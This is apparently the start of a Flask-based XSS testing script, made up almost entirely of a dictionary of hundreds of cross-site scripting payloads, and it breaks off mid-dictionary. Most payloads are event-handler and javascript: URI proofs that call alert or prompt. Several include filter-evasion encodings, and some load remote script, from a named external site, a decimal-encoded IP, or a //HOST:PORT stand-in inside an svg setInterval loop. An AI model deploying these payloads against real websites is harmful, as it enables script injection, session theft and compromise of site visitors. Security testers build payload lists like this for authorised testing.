from flask import Flask, render_template, request
import requests
 #XSS payloads dictionary
xss_dict = {
    "x1": "<script>alert('XSS');</script>",
    "x2": "<img src='x' onerror='alert(\"XSS\");'>",
    "x3": "<iframe src='javascript:alert(\"XSS\");'></iframe>",
    "x4": "<input type='text' value='<script>alert(\"XSS\");</script>'>",
    "x5": "<body onload='alert(\"XSS\");'>",
    "x6": "<link rel='stylesheet' href='javascript:alert(\"XSS\");'>",
    "x7": "<a href='javascript:alert(\"XSS\");'>Click me</a>",
    "x8": "<form action='javascript:alert(\"XSS\");'>",
    "x9": "<div onmouseover='alert(\"XSS\");'>Hover over me</div>",
    "x10": "<button onclick='alert(\"XSS\");'>Click me</button>",
    "x11": "<meta http-equiv='refresh' content='0;url=javascript:alert(\"XSS\");'>",
    "x12": "<svg onload='alert(\"XSS\");'></svg>",
    "x13": "<object data='javascript:alert(\"XSS\");'></object>",
    "x14": "<embed src='javascript:alert(\"XSS\");'>",
    "x15": "<base href='javascript:alert(\"XSS\");'>",
    "x16": "<audio src='javascript:alert(\"XSS\");'></audio>",
    "x17": "<video src='javascript:alert(\"XSS\");'></video>",
    "x18": "<details ontoggle='alert(\"XSS\");'></details>",
    "x19": "<img src='x' onload='alert(\"XSS\");'>",
    "x20": "<img src='x' onerror='alert(\"XSS\");'>",
    "x21": "<button onclick='alert(\"XSS\");'>Click me</button>",
    "x22": "<div onmouseover='alert(\"XSS\");'>Hover over me</div>",
    "x23": "<input onfocus='alert(\"XSS\");'>",
    "x24": "<input onblur='alert(\"XSS\");'>",
    "x25": "<input onchange='alert(\"XSS\");'>",
    "x26": "<form onsubmit='alert(\"XSS\");'>",
    "x27": "<form onreset='alert(\"XSS\");'>",
    "x28": "<marquee onstart='alert(\"XSS\");'>Scrolling text</marquee>",
    "x29": "<bgsound src='javascript:alert(\"XSS\");'>",
    "x30": "<basefont face='javascript:alert(\"XSS\");'>",
    "x31": "<isindex action='javascript:alert(\"XSS\");'>",
    "x32": "<textarea onfocus='alert(\"XSS\");'></textarea>",
    "x33": "<frame src='javascript:alert(\"XSS\");'>",
    "x34": "<frameset onload='alert(\"XSS\");'></frameset>",
    "x35": "<noframes onload='alert(\"XSS\");'></noframes>",
    "x36": "<applet code='javascript:alert(\"XSS\");'></applet>",
    "x37": "<b onmouseover='alert(\"XSS\");'>Bold text</b>",
    "x38": "<u onclick='alert(\"XSS\");'>Underlined text</u>",
    "x39": "<i onmouseover='alert(\"XSS\");'>Italic text</i>",
    "x40": "<center onmouseover='alert(\"XSS\");'>Centered text</center>",
    "x41": "<span onclick='alert(\"XSS\");'>Span text</span>",
    "x42": "<blink onmouseover='alert(\"XSS\");'>Blinking text</blink>",
    "x43": "<font onmouseover='alert(\"XSS\");'>Font text</font>",
    "x44": "<tt onmouseover='alert(\"XSS\");'>Typewriter text</tt>",
    "x45": "<kbd onmouseover='alert(\"XSS\");'>Keyboard text</kbd>",
    "x46": "<samp onmouseover='alert(\"XSS\");'>Sample text</samp>",
    "x47": "<var onmouseover='alert(\"XSS\");'>Variable text</var>",
    "x48": "<abbr onmouseover='alert(\"XSS\");'>Abbreviated text</abbr>",
    "x49": "<cite onmouseover='alert(\"XSS\");'>Cited text</cite>",
    "x50": "<input onkeydown='alert(\"XSS\");'>",
    "x51": "<input onkeydown='alert(\"XSS\");'>",
    "x52": "<input onkeypress='alert(\"XSS\");'>",
    "x53": "<input onkeyup='alert(\"XSS\");'>",
    "x54": "<input oninput='alert(\"XSS\");'>",
    "x55": "<input onpaste='alert(\"XSS\");'>",
    "x56": "<input oncopy='alert(\"XSS\");'>",
    "x57": "<input oncut='alert(\"XSS\");'>",
    "x58": "<div oncontextmenu='alert(\"XSS\");'>Right-click me</div>",
    "x59": "<div onmouseenter='alert(\"XSS\");'>Enter me</div>",
    "x60": "<div onmouseleave='alert(\"XSS\");'>Leave me</div>",
    "x61": "<div onmousedown='alert(\"XSS\");'>Mouse down</div>",
    "x62": "<div onmouseup='alert(\"XSS\");'>Mouse up</div>",
    "x63": "<div onwheel='alert(\"XSS\");'>Scroll me</div>",
    "x64": "<div ondrop='alert(\"XSS\");'>Drop here</div>",
    "prompt_injection_1": "\"-prompt(8)-\"",
    "prompt_injection_2": "'-prompt(8)-'",
    "prompt_injection_3": "\";a=prompt,a()//",
    "prompt_injection_4": "';a=prompt,a()//",
    "prompt_injection_5": "'-eval(\"window \")-'",
    "prompt_injection_6": "\"-eval(\"window \")-\"",
    "prompt_injection_7": "\"onclick=prompt(8)>\"@x.y",
    "prompt_injection_8": "\"onclick=prompt(8)><svg/onload=prompt(8)>\"@x.y",
    "image_src_onerror_1": "<image/src/onerror=prompt(8)>",
    "img_src_onerror_1": "<img/src/onerror=prompt(8)>",
    "image_src_onerror_2": "<image src/onerror=prompt(8)>",
    "img_src_onerror_2": "<img src/onerror=prompt(8)>",
    "image_src_onerror_3": "<image src =q onerror=prompt(8)>",
    "img_src_onerror_3": "<img src =q onerror=prompt(8)>",
    "script_img_src_onerror": "</scrip</script>t><img src =q onerror=prompt(8)>",
    "svg_onload_1": "<svg onload=alert(1)>",
    "svg_onload_2": "\"><svg onload=alert(1)//",
    "onmouseover_alert_1": "\"onmouseover=alert(1)//",
    "autofocus_onfocus_alert_1": "\"autofocus/onfocus=alert(1)//",
    "alert_1": "'-alert(1)-'",
    "alert_2": "'-alert(1)//",
    "alert_3": "\\'-alert(1)//",
    "script_svg_onload": "</script><svg onload=alert(1)>",
    "x_contenteditable_onblur_alert": "<x contenteditable onblur=alert(1)>lose focus!",
    "x_onclick_alert": "<x onclick=alert(1)>click this!",
    "x_oncopy_alert": "<x oncopy=alert(1)>copy this!",
    "x_oncontextmenu_alert": "<x oncontextmenu=alert(1)>right click this!",
    "x_oncut_alert": "<x oncut=alert(1)>copy this!",
    "x_ondblclick_alert": "<x ondblclick=alert(1)>double click this!",
    "x_ondrag_alert": "<x ondrag=alert(1)>drag this!",
    "x_contenteditable_onfocus_alert": "<x contenteditable onfocus=alert(1)>focus this!",
    "x_contenteditable_oninput_alert": "<x contenteditable oninput=alert(1)>input here!",
    "x_contenteditable_onkeydown_alert": "<x contenteditable onkeydown=alert(1)>press any key!",
    "x_contenteditable_onkeypress_alert": "<x contenteditable onkeypress=alert(1)>press any key!",
    "x_contenteditable_onkeyup_alert": "<x contenteditable onkeyup=alert(1)>press any key!",
    "x_onmousedown_alert": "<x onmousedown=alert(1)>click this!",
    "x_onmousemove_alert": "<x onmousemove=alert(1)>hover this!",
    "x_onmouseout_alert": "<x onmouseout=alert(1)>hover this!",
    "x_onmouseover_alert": "<x onmouseover=alert(1)>hover this!",
    "x_onmouseup_alert": "<x onmouseup=alert(1)>click this!",
    "x_contenteditable_onpaste_alert": "<x contenteditable onpaste=alert(1)>paste here!",
    "script_alert_1": "<script>alert(1)//",
    "script_alert_2": "<script>alert(1)<!–",
    "script_src_alert": "<script src=//brutelogic.com.br/1.js>",
    "script_src_alert_2": "<script src=//3334957647/1>",
    "x_onxxx_alert_1": "%3Cx onxxx=alert(1)",
    "x_onxxx_alert_2": "<%78 onxxx=1",
    "x_onxxx_alert_3": "<x %6Fnxxx=1",
    "x_onxxx_alert_4": "<x o%6Exxx=1",
    "x_onxxx_alert_5": "<x on%78xx=1",
    "x_onxxx_alert_6": "<x onxxx%3D1",
    "x_onxxx_alert_7": "<X onxxx=1",
    "x_onxxx_alert_8": "<x OnXxx=1",
    "x_onxxx_alert_9": "<X OnXxx=1",
    "x_onxxx_alert_10": "<x onxxx=1 onxxx=1",
    "x_onxxx_alert_11": "<x/onxxx=1",
    "x_onxxx_alert_12": "<x%09onxxx=1",
    "x_onxxx_alert_13": "<x%0Aonxxx=1",
    "x_onxxx_alert_14": "<x%0Conxxx=1",
    "x_onxxx_alert_15": "<x%0Donxxx=1",
    "x_onxxx_alert_16": "<x%2Fonxxx=1",
    "x_onxxx_alert_17": "<x 1='1'onxxx=1",
    "x_onxxx_alert_18": "<x 1=\"1\"onxxx=1",
    "x_onxxx_alert_19": "<x </onxxx=1",
    "x_onxxx_alert_20": "<x 1=\">\" onxxx=1",
    "x_onxxx_alert_21": "<http://onxxx%3D1/",
    "x_onxxx_alert_22": "<x onxxx=alert(1) 1='",
    "svg_setInterval_script_src": "<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>",
    "onload_svg_alert": "'onload=alert(1)><svg/1='",
    "alert_script_end_script": "'>alert(1)</script><script/1='",
    "alert_script_comment": "*/alert(1)</script><script>/*",
    "alert_onload_svg_1": "*/alert(1)\"'onload=\"/*<svg/1='",
    "alert_onload_svg_2": "`-alert(1)\"'onload=\"`<svg/1='",
    "alert_script_comment_end_script": "*/</script>'>alert(1)/*<script/1='",
    "script_alert_3": "<script>alert(1)</script>",
    "script_src_js_alert": "<script src=javascript:alert(1)>",
    "iframe_src_js_alert": "<iframe src=javascript:alert(1)>",
    "embed_src_js_alert": "<embed src=javascript:alert(1)>",
    "a_href_js_alert": "<a href=javascript:alert(1)>click",
    "math_brute_js_alert": "<math><brute href=javascript:alert(1)>click",
    "form_action_js_alert": "<form action=javascript:alert(1)><input type=submit>",
    "isindex_action_js_alert": "<isindex action=javascript:alert(1) type=submit value=click>",
    "form_button_js_alert": "<form><button formaction=javascript:alert(1)>click",
    "form_input_submit_js_alert": "<form><input formaction=javascript:alert(1) type=submit value=click>",
    "form_input_image_js_alert": "<form><input formaction=javascript:alert(1) type=image value=click>",
    "form_input_image_src_js_alert": "<form><input formaction=javascript:alert(1) type=image src=SOURCE>",
    "isindex_formaction_js_alert": "<isindex formaction=javascript:alert(1) type=submit value=click>",
    "object_data_js_alert": "<object data=javascript:alert(1)>",
    "iframe_srcdoc_svg_onload_alert": "<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>",
    "svg_script_xlink_alert": "<svg><script xlink:href=data:,alert(1) />",
    "math_brute_xlink_alert": "<math><brute xlink:href=javascript:alert(1)>click",
    "svg_circle_animate_xlink_alert": "<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>",
    "html_ontouchstart_alert": "<html ontouchstart=alert(1)>",
    "html_ontouchend_alert": "<html ontouchend=alert(1)>",
    "html_ontouchmove_alert": "<html ontouchmove=alert(1)>",
    "html_ontouchcancel_alert": "<html ontouchcancel=alert(1)>",
    "html_ongesturestart_alert": "<html ongesturestart=alert(1)>",
    "html_ongesturechange_alert": "<html ongesturechange=alert(1)>",
    "html_ongestureend_alert": "<html ongestureend=alert(1)>",
    "html_onorientationchange_alert": "<html onorientationchange=alert(1)>",
    "html_onerror_alert": "<html onerror=alert(1)>",
    "html_ononline_alert": "<html ononline=alert(1)>",
    "html_onoffline_alert": "<html onoffline=alert(1)>",
    "html_onpopstate_alert": "<html onpopstate=alert(1)>",
    "html_onstorage_alert": "<html onstorage=alert(1)>",
    "html_onhashchange_alert": "<html onhashchange=alert(1)>",
    "html_onafterprint_alert": "<html onafterprint=alert(1)>",
    "html_onbeforeprint_alert": "<html onbeforeprint=alert(1)>",
    "html_onmessage_alert": "<html onmessage=alert(1)>",
    "html_onbeforeunload_alert": "<html onbeforeunload=alert(1)>",
    "html_onpagehide_alert": "<html onpagehide=alert(1)>",
    "html_onpageshow_alert": "<html onpageshow=alert(1)>",
    "html_onresize_alert": "<html onresize=alert(1)>",
    "html_onunload_alert": "<html onunload=alert(1)>",
    "html_onblur_alert": "<html onblur=alert(1)>",
    "html_onchange_alert": "<html onchange=alert(1)>",
    "html_onfocus_alert": "<html onfocus=alert(1)>",
    "html_onreset_alert": "<html onreset=alert(1)>",
    "html_onsearch_alert": "<html onsearch=alert(1)>",
    "html_onselect_alert": "<html onselect=alert(1)>",
    "html_onsubmit_alert": "<html onsubmit=alert(1)>",
    "html_onkeydown_alert": "<html onkeydown=alert(1)>",
    "html_onkeypress_alert": "<html onkeypress=alert(1)>",
    "html_onkeyup_alert": "<html onkeyup=alert(1)>",
    "html_oncontextmenu_alert": "<html oncontextmenu=alert(1)>",
    "html_oncopy_alert": "<html oncopy=alert(1)>",
    "html_oncut_alert": "<html oncut=alert(1)>",
    "html_onpaste_alert": "<html onpaste=alert(1)>",
    "html_onmouse_alert": "<html onmouse=alert(1)>",
    "html_onload_alert": "<html onload=alert(1)>",
    "html_onmouseenter_alert": "<html onmouseenter=alert(1)>",
    "html_onmouseleave_alert": "<html onmouseleave=alert(1)>",
    "html_onmousemove_alert": "<html onmousemove=alert(1)>",
    "html_onmouseout_alert": "<html onmouseout=alert(1)>",
    "html_onmouseover_alert": "<html onmouseover=alert(1)>",
    "html_onmouseup_alert": "<html onmouseup=alert(1)>",
    "html_ondblclick_alert": "<html ondblclick=alert(1)>",
    "html_ondrag_alert": "<html ondrag=alert(1)>",
    "html_ondragend_alert": "<html ondragend=alert(1)>",
    "html_ondragenter_alert": "<html ondragenter=alert(1)>",
    "html_ondragleave_alert": "<html ondragleave=alert(1)>",
    "html_ondragover_alert": "<html ondragover=alert(1)>",
    "html_ondragstart_alert": "<html ondragstart=alert(1)>",
    "html_ondrop_alert": "<html ondrop=alert(1)>",
    "html_onmousewheel_alert": "<html onmousewheel=alert(1)>",
    "html_onscroll_alert": "<html onscroll=alert(1)>",
    "html_onwheel_alert": "<html onwheel=alert(1)>",
    "html_oninput_alert": "<html oninput=alert(1)>",
    "html_oninvalid_alert": "<html oninvalid=alert(1)>",
    "html_onforminput_alert": "<html onforminput=alert(1)>",
    "html_onformchange_alert": "<html onformchange=alert(1)>",
    "html_onloadstart_alert": "<html onloadstart=alert(1)>",
    "html_onloadend_alert": "<html onloadend=alert(1)>",
    "html_onprogress_alert": "<html onprogress=alert(1)>",
    "html_onended_alert": "<html onended=alert(1)>",
    "html_onpause_alert": "<html onpause=alert(1)>",
    "html_onplay_alert": "<html onplay=alert(1)>",
    "html_onplaying_alert": "<html onplaying=alert(1)>",
    "html_onratechange_alert": "<html onratechange=alert(1)>",
    "html_onseeked_alert": "<html onseeked=alert(1)>",
    "html_onseeking_alert": "<html onseeking=alert(1)>",
    "html_onstalled_alert": "<html onstalled=alert(1)>",
    "html_oncanplay_alert": "<html oncanplay=alert(1)>",
    "html_oncanplaythrough_alert": "<html oncanplaythrough=alert(1)>",
    "html_ondurationchange_alert": "<html ondurationchange=alert(1)>",
    "html_onloadedmetadata_alert": "<html onloadedmetadata=alert(1)>",
    "html_onloadeddata_alert": "<html onloadeddata=alert(1)>",
    "html_onabort_alert": "<html onabort=alert(1)>",
    "html_onemptied_alert": "<html onemptied=alert(1)>",
    "html_onwaiting_alert": "<html onwaiting=alert(1)>",
    "html_onsuspend_alert": "<html onsuspend=alert(1)>",
    "html_onvolumechange_alert": "<html onvolumechange=alert(1)>",
    "html_ontimeupdate_alert": "<html ontimeupdate=alert(1)>",
    "html_oncuechange_alert": "<html oncuechange=alert(1)>",
    "html_onoffline_alert": "<html onoffline=alert(1)>",
    "html_ononline_alert": "<html ononline=alert(1)>",
    "html_onshow_alert": "<html onshow=alert(1)>",
    "html_onmessage_alert": "<html onmessage=alert(1)>",
    "html_onstorage_alert": "<html onstorage=alert(1)>",
    "html_onerror_alert": "<html onerror=alert(1)>",
    "html_onpagehide_alert": "<html onpagehide=alert(1)>",
    "html_onpageshow_alert": "<html onpageshow=alert(1)>",
    "html_onbeforeunload_alert": "<html onbeforeunload=alert(1)>",
    "html_onpopstate_alert": "<html onpopstate=alert(1)>",
    "html_onhashchange_alert": "<html onhashchange=alert(1)>",
    "html_onafterprint_alert": "<html onafterprint=alert(1)>",
    "html_onbeforeprint_alert": "<html onbeforeprint=alert(1)>",
    "html_onunload_alert": "<html onunload=alert(1)>",
    "html_onsearch_alert": "<html onsearch=alert(1)>",
    "basefont ondrag": '<basefont draggable="true" ondrag="alert(1)">test</basefont>',
    "basefont ondragend": '<basefont draggable="true" ondragend="alert(1)">test</basefont>',
    "basefont ondragenter": '<basefont draggable="true" ondragenter="alert(1)">test</basefont>',
    "basefont ondragleave": '<basefont draggable="true" ondragleave="alert(1)">test</basefont>',
    "basefont ondragstart": '<basefont draggable="true" ondragstart="alert(1)">test</basefont>',
    "basefont onactivate": '<basefont id=x tabindex=1 onactivate=alert(1)></basefont>',
    "basefont onbeforeactivate": '<basefont id=x tabindex=1 onbeforeactivate=alert(1)></basefont>',
    "basefont onbeforedeactivate": '<basefont id=x tabindex=1 onbeforedeactivate=alert(1)></basefont><input autofocus>',
    "basefont ondeactivate": '<basefont id=x tabindex=1 ondeactivate=alert(1)></basefont><input id=y autofocus>',
    "basefont onfocus": '<basefont id=x tabindex=1 onfocus=alert(1)></basefont>',
    "basefont onfocusin": '<basefont id=x tabindex=1 onfocusin=alert(1)></basefont>',
    "basefont onbeforecopy": '<basefont onbeforecopy="alert(1)" contenteditable>test</basefont>',
    "basefont onbeforecut": '<basefont onbeforecut="alert(1)" contenteditable>test</basefont>',
    "basefont onbeforepaste": '<basefont onbeforepaste="alert(1)" contenteditable>test</basefont>',
    "basefont onblur": '<basefont onblur=alert(1) tabindex=1 id=x></basefont><input autofocus>',
    "basefont onclick": '<basefont onclick="alert(1)">test</basefont>',
    "basefont oncontextmenu": '<basefont oncontextmenu="alert(1)">test</basefont>',
    "basefont oncopy": '<basefont oncopy="alert(1)" contenteditable>test</basefont>',
    "basefont oncut": '<basefont oncut="alert(1)" contenteditable>test</basefont>',
    "basefont ondblclick": '<basefont ondblclick="alert(1)">test</basefont>',
    "basefont onfocusout": '<basefont onfocusout=alert(1) tabindex=1 id=x></basefont><input autofocus>',
    "basefont onkeydown": '<basefont onkeydown="alert(1)" contenteditable>test</basefont>',
    "basefont onkeypress": '<basefont onkeypress="alert(1)" contenteditable>test</basefont>',
    "basefont onkeyup": '<basefont onkeyup="alert(1)" contenteditable>test</basefont>',
    "basefont onmousedown": '<basefont onmousedown="alert(1)">test</basefont>',
    "basefont onmouseenter": '<basefont onmouseenter="alert(1)">test</basefont>',
    "basefont onmouseleave": '<basefont onmouseleave="alert(1)">test</basefont>',
    "basefont onmousemove": '<basefont onmousemove="alert(1)">test</basefont>',
    "basefont onmouseout": '<basefont onmouseout="alert(1)">test</basefont>',
    "basefont onmouseover": '<basefont onmouseover="alert(1)">test</basefont>',
    "basefont onmouseup": '<basefont onmouseup="alert(1)">test</basefont>',
    "basefont onpaste": '<basefont onpaste="alert(1)" contenteditable>test</basefont>',
    "bdi ondrag": '<bdi draggable="true" ondrag="alert(1)">test</bdi>',
    "bdi ondragend": '<bdi draggable="true" ondragend="alert(1)">test</bdi>',
    "bdi ondragenter": '<bdi draggable="true" ondragenter="alert(1)">test</bdi>',
    "bdi ondragleave": '<bdi draggable="true" ondragleave="alert(1)">test</bdi>',
    "bdi ondragstart": '<bdi draggable="true" ondragstart="alert(1)">test</bdi>',
    "bdi onactivate": '<bdi id=x tabindex=1 onactivate=alert(1)></bdi>',
    "bdi onbeforeactivate": '<bdi id=x tabindex=1 onbeforeactivate=alert(1)></bdi>',
    "bdi onbeforedeactivate": '<bdi id=x tabindex=1 onbeforedeactivate=alert(1)></bdi><input autofocus>',
    "bdi ondeactivate": '<bdi id=x tabindex=1 ondeactivate=alert(1)></bdi><input id=y autofocus>',
    "bdi onfocus": '<bdi id=x tabindex=1 onfocus=alert(1)></bdi>',
    "bdi onfocusin": '<bdi id=x tabindex=1 onfocusin=alert(1)></bdi>',
    "bdi onbeforecopy": '<bdi onbeforecopy="alert(1)" contenteditable>test</bdi>',
    "bdi onbeforecut": '<bdi onbeforecut="alert(1)" contenteditable>test</bdi>',
    "bdi onbeforepaste": '<bdi onbeforepaste="alert(1)" contenteditable>test</bdi>',
    "bdi onblur": '<bdi onblur=alert(1) tabindex=1 id=x></bdi><input autofocus>',
    "bdi onclick": '<bdi onclick="alert(1)">test</bdi>',
    "bdi oncontextmenu": '<bdi oncontextmenu="alert(1)">test</bdi>',
    "bdi oncopy": '<bdi oncopy="alert(1)" contenteditable>test</bdi>',
    "bdi oncut": '<bdi oncut="alert(1)" contenteditable>test</bdi>',
    "bdi ondblclick": '<bdi ondblclick="alert(1)">test</bdi>',
    "bdi onfocusout": '<bdi onfocusout=alert(1) tabindex=1 id=x></bdi><input autofocus>',
    "bdi onkeydown": '<bdi onkeydown="alert(1)" contenteditable>test</bdi>',
    "bdi onkeypress": '<bdi onkeypress="alert(1)" contenteditable>test</bdi>',
    "bdi onkeyup": '<bdi onkeyup="alert(1)" contenteditable>test</bdi>',
    "bdi onmousedown": '<bdi onmousedown="alert(1)">test</bdi>',
    "bdi onmouseenter": '<bdi onmouseenter="alert(1)">test</bdi>',
    "bdi onmouseleave": '<bdi onmouseleave="alert(1)">test</bdi>',
    "bdi onmousemove": '<bdi onmousemove="alert(1)">test</bdi>',
    "bdi onmouseout": '<bdi onmouseout="alert(1)">test</bdi>',
    "bdi onmouseover": '<bdi onmouseover="alert(1)">test</bdi>',
    "bdi onmouseup": '<bdi onmouseup="alert(1)">test</bdi>',
    "bdi onpaste": '<bdi onpaste="alert(1)" contenteditable>test</bdi>',
    "bdo ondrag": '<bdo draggable="true" ondrag="alert(1)">test</bdo>',
    "bdo ondragend": '<bdo draggable="true" ondragend="alert(1)">test</bdo>',
    "bdo ondragenter": '<bdo draggable="true" ondragenter="alert(1)">test</bdo>',
    "bdo ondragleave": '<bdo draggable="true" ondragleave="alert(1)">test</bdo>',
    "bdo ondragstart": '<bdo draggable="true" ondragstart="alert(1)">test</bdo>',
    "bdo onactivate": '<bdo id=x tabindex=1 onactivate=alert(1)></bdo>',
    "bdo onbeforeactivate": '<bdo id=x tabindex=1 onbeforeactivate=alert(1)></bdo>',
    "bdo onbeforedeactivate": '<bdo id=x tabindex=1 onbeforedeactivate=alert(1)></bdo><input autofocus>',
    "bdo ondeactivate": '<bdo id=x tabindex=1 ondeactivate=alert(1)></bdo><input id=y autofocus>',
    "bdo onfocus": '<bdo id=x tabindex=1 onfocus=alert(1)></bdo>',
    "bdo onfocusin": '<bdo id=x tabindex=1 onfocusin=alert(1)></bdo>',
    "bdo onbeforecopy": '<bdo onbeforecopy="alert(1)" contenteditable>test</bdo>',
    "bdo onbeforecut": '<bdo onbeforecut="alert(1)" contenteditable>test</bdo>',
    "bdo onbeforepaste": '<bdo onbeforepaste="alert(1)" contenteditable>test</bdo>',
    "bdo onblur": '<bdo onblur=alert(1) tabindex=1 id=x></bdo><input autofocus>',
    "bdo onclick": '<bdo onclick="alert(1)">test</bdo>',
    "bdo oncontextmenu": '<bdo oncontextmenu="alert(1)">test</bdo>',
    "bdo oncopy": '<bdo oncopy="alert(1)" contenteditable>test</bdo>',
    "bdo oncut": '<bdo oncut="alert(1)" contenteditable>test</bdo>',
    "bdo ondblclick": '<bdo ondblclick="alert(1)">test</bdo>',
    "bdo onfocusout": '<bdo onfocusout=alert(1) tabindex=1 id=x></bdo><input autofocus>',
    "bdo onkeydown": '<bdo onkeydown="alert(1)" contenteditable>test</bdo>',
    "bdo onkeypress": '<bdo onkeypress="alert(1)" contenteditable>test</bdo>',
    "bdo onkeyup": '<bdo onkeyup="alert(1)" contenteditable>test</bdo>',
    "bdo onmousedown": '<bdo onmousedown="alert(1)">test</bdo>',
    "bdo onmouseenter": '<bdo onmouseenter="alert(1)">test</bdo>',
    "bdo onmouseleave": '<bdo onmouseleave="alert(1)">test</bdo>',
    "bdo onmousemove": '<bdo onmousemove="alert(1)">test</bdo>',
    "bdo onmouseout": '<bdo onmouseout="alert(1)">test</bdo>',
    "bdo onmouseover": '<bdo onmouseover="alert(1)">test</bdo>',
    "bdo onmouseup": '<bdo onmouseup="alert(1)">test</bdo>',
    "bdo onpaste": '<bdo onpaste="alert(1)" contenteditable>test</bdo>',
    "bgsound ondrag": '<bgsound draggable="true" ondrag="alert(1)">test</bgsound>',
    "bgsound ondragend": '<bgsound draggable="true" ondragend="alert(1)">test</bgsound>',
    "bgsound ondragenter": '<bgsound draggable="true" ondragenter="alert(1)">test</bgsound>',
    "bgsound ondragleave": '<bgsound draggable="true" ondragleave="alert(1)">test</bgsound>',
    "bgsound ondragstart": '<bgsound draggable="true" ondragstart="alert(1)">test</bgsound>',
    "bgsound onactivate": '<bgsound id=x tabindex=1 onactivate=alert(1)></bgsound>',
    "bgsound onbeforeactivate": '<bgsound id=x tabindex=1 onbeforeactivate=alert(1)></bgsound>',
    "bgsound onbeforedeactivate": '<bgsound id=x tabindex=1 onbeforedeactivate=alert(1)></bgsound><input autofocus>',
    "bgsound ondeactivate": '<bgsound id=x tabindex=1 ondeactivate=alert(1)></bgsound><input id=y autofocus>',
    "bgsound onfocus": '<bgsound id=x tabindex=1 onfocus=alert(1)></bgsound>',
    "bgsound onfocusin": '<bgsound id=x tabindex=1 onfocusin=alert(1)></bgsound>',
    "bgsound onbeforecopy": '<bgsound onbeforecopy="alert(1)" contenteditable>test</bgsound>',
    "bgsound onbeforecut": '<bgsound onbeforecut="alert(1)" contenteditable>test</bgsound>',
    "bgsound onbeforepaste": '<bgsound onbeforepaste="alert(1)" contenteditable>test</bgsound>',
    "bgsound onblur": '<bgsound onblur=alert(1) tabindex=1 id=x></bgsound><input autofocus>',
    "bgsound onclick": '<bgsound onclick="alert(1)">test</bgsound>',
    "bgsound oncontextmenu": '<bgsound oncontextmenu="alert(1)">test</bgsound>',
    "bgsound oncopy": '<bgsound oncopy="alert(1)" contenteditable>test</bgsound>',
    "bgsound oncut": '<bgsound oncut="alert(1)" contenteditable>test</bgsound>',
    "bgsound ondblclick": '<bgsound ondblclick="alert(1)">test</bgsound>',
    "bgsound onfocusout": '<bgsound onfocusout=alert(1) tabindex=1 id=x></bgsound><input autofocus>',
    "bgsound onkeydown": '<bgsound onkeydown="alert(1)" contenteditable>test</bgsound>',
    "bgsound onkeypress": '<bgsound onkeypress="alert(1)" contenteditable>test</bgsound>',
    "bgsound onkeyup": '<bgsound onkeyup="alert(1)" contenteditable>test</bgsound>',
    "bgsound onmousedown": '<bgsound onmousedown="alert(1)">test</bgsound>',
    "bgsound onmouseenter": '<bgsound onmouseenter="alert(1)">test</bgsound>',
    "bgsound onmouseleave": '<bgsound onmouseleave="alert(1)">test</bgsound>',
    "bgsound onmousemove": '<bgsound onmousemove="alert(1)">test</bgsound>',
    "bgsound onmouseout": '<bgsound onmouseout="alert(1)">test</bgsound>',
    "bgsound onmouseover": '<bgsound onmouseover="alert(1)">test</bgsound>',
    "bgsound onmouseup": '<bgsound onmouseup="alert(1)">test</bgsound>',
    "bgsound onpaste": '<bgsound onpaste="alert(1)" contenteditable>test</bgsound>',
    "big ondrag": '<big draggable="true" ondrag="alert(1)">test</big>',
    "big ondragend": '<big draggable="true" ondragend="alert(1)">test</big>',
    "big ondragenter": '<big draggable="true" ondragenter="alert(1)">test</big>',
    "big ondragleave": '<big draggable="true" ondragleave="alert(1)">test</big>',
    "big ondragstart": '<big draggable="true" ondragstart="alert(1)">test</big>',
    "big onactivate": '<big id=x tabindex=1 onactivate=alert(1)></big>',
    "big onbeforeactivate": '<big id=x tabindex=1 onbeforeactivate=alert(1)></big>',
    "big onbeforedeactivate": '<big id=x tabindex=1 onbeforedeactivate=alert(1)></big><input autofocus>',
    "big ondeactivate": '<big id=x tabindex=1 ondeactivate=alert(1)></big><input id=y autofocus>',
    "big onfocus": '<big id=x tabindex=1 onfocus=alert(1)></big>',
    "big onfocusin": '<big id=x tabindex=1 onfocusin=alert(1)></big>',
    "w2": "<sVg/onLOad=document.body.append(`cb06dba3`.repeat(2))>",
     "<big onbeforecopy=\"alert(1)\" contenteditable>test</big>": "<big onbeforecopy=\"alert(1)\" contenteditable>test</big>",
    "<big onbeforecut=\"alert(1)\" contenteditable>test</big>": "<big onbeforecut=\"alert(1)\" contenteditable>test</big>",
    "<big onbeforepaste=\"alert(1)\" contenteditable>test</big>": "<big onbeforepaste=\"alert(1)\" contenteditable>test</big>",
    "<big onblur=alert(1) tabindex=1 id=x></big><input autofocus>": "<big onblur=alert(1) tabindex=1 id=x></big><input autofocus>",
    "<big onclick=\"alert(1)\">test</big>": "<big onclick=\"alert(1)\">test</big>",
    "<big oncontextmenu=\"alert(1)\">test</big>": "<big oncontextmenu=\"alert(1)\">test</big>",
    "<big oncopy=\"alert(1)\" contenteditable>test</big>": "<big oncopy=\"alert(1)\" contenteditable>test</big>",
    "<big oncut=\"alert(1)\" contenteditable>test</big>": "<big oncut=\"alert(1)\" contenteditable>test</big>",
    "<big ondblclick=\"alert(1)\">test</big>": "<big ondblclick=\"alert(1)\">test</big>",
    "<big onfocusout=alert(1) tabindex=1 id=x></big><input autofocus>": "<big onfocusout=alert(1) tabindex=1 id=x></big><input autofocus>",
    "<big onkeydown=\"alert(1)\" contenteditable>test</big>": "<big onkeydown=\"alert(1)\" contenteditable>test</big>",
    "<big onkeypress=\"alert(1)\" contenteditable>test</big>": "<big onkeypress=\"alert(1)\" contenteditable>test</big>",
    "<big onkeyup=\"alert(1)\" contenteditable>test</big>": "<big onkeyup=\"alert(1)\" contenteditable>test</big>",
    "<big onmousedown=\"alert(1)\">test</big>": "<big onmousedown=\"alert(1)\">test</big>",
    "<big onmouseenter=\"alert(1)\">test</big>": "<big onmouseenter=\"alert(1)\">test</big>",
    "<big onmouseleave=\"alert(1)\">test</big>": "<big onmouseleave=\"alert(1)\">test</big>",
    "<big onmousemove=\"alert(1)\">test</big>": "<big onmousemove=\"alert(1)\">test</big>",
    "<big onmouseout=\"alert(1)\">test</big>": "<big onmouseout=\"alert(1)\">test</big>",
    "<big onmouseover=\"alert(1)\">test</big>": "<big onmouseover=\"alert(1)\">test</big>",
    "<big onmouseup=\"alert(1)\">test</big>": "<big onmouseup=\"alert(1)\">test</big>",
